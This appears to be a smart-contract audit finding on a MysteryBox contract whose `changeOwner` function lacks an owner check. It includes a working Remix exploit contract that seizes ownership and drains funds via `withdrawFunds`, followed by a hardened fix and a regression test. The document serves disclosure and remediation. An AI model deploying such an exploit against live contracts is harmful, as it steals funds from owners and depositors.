There is a critical vulnerability in the `changeOwner` function: anyone can call it and change the MysteryBox contract owner.
An attacker can call `changeOwner(address(this));` from a remote contract. This gives the calling address ownership of the MysteryBox contract. The malicious user can then call `withdrawFunds();` and retrieve all of the contract funds to their malicious contract.
Remix POC:
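```solidity
// SPDX-License-Identifier: MIT

// Only the two MysteryBox functions the PoC needs.
interface IMagic {
    function changeOwner(address _newOwner) external;
    function withdrawFunds() external;
}

contract Exploit {
    IMagic magic;
    address payable public owner;

    constructor(address _magicAddress) {
        magic = IMagic(_magicAddress);
        owner = payable(msg.sender);
    }

    function attack() public {
        // changeOwner has no caller check, so this contract becomes the owner.
        magic.changeOwner(address(this));
        // As the new owner, this contract can drain the balance.
        magic.withdrawFunds();
    }

    // Accept the withdrawn ETH.
    receive() external payable {}
}
```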
Total loss of MysteryBox contract holdings.
Remix
Change `function changeOwner(address _newOwner)` to first check whether the caller is the owner. If the caller is not the owner, revert.
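One way to implement the recommended check, as an added example that is not the MysteryBox project's code. Only `changeOwner` and `withdrawFunds` are named in this finding; the contract name, compiler version, errors, event, zero-address check and the helper contract are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20; // assumed version; custom errors need >= 0.8.4

// Hypothetical minimal stand-in for the audited contract.
contract MysteryBoxHardened {
    address public owner;

    error NotOwner(address caller);
    error ZeroAddress();
    error TransferFailed();

    event OwnerChanged(address indexed previousOwner, address indexed newOwner);

    constructor() payable {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner(msg.sender);
        _;
    }

    // The fix: only the current owner may transfer ownership.
    function changeOwner(address _newOwner) external onlyOwner {
        if (_newOwner == address(0)) revert ZeroAddress();
        emit OwnerChanged(owner, _newOwner);
        owner = _newOwner;
    }

    // Assumed to be owner-gated, as the finding implies.
    function withdrawFunds() external onlyOwner {
        (bool ok, ) = payable(owner).call{value: address(this).balance}("");
        if (!ok) revert TransferFailed();
    }
}

// Regression check: a caller that is not the owner must be rejected.
contract UnauthorizedCallerCheck {
    function changeOwnerReverts(MysteryBoxHardened box) external returns (bool) {
        try box.changeOwner(address(this)) {
            return false; // call succeeded: access control is missing
        } catch {
            return true; // reverted, as the fix requires
        }
    }
}
```

Deploying both contracts in Remix and calling `changeOwnerReverts` with the box address should return `true`, and `owner` should remain the deployer.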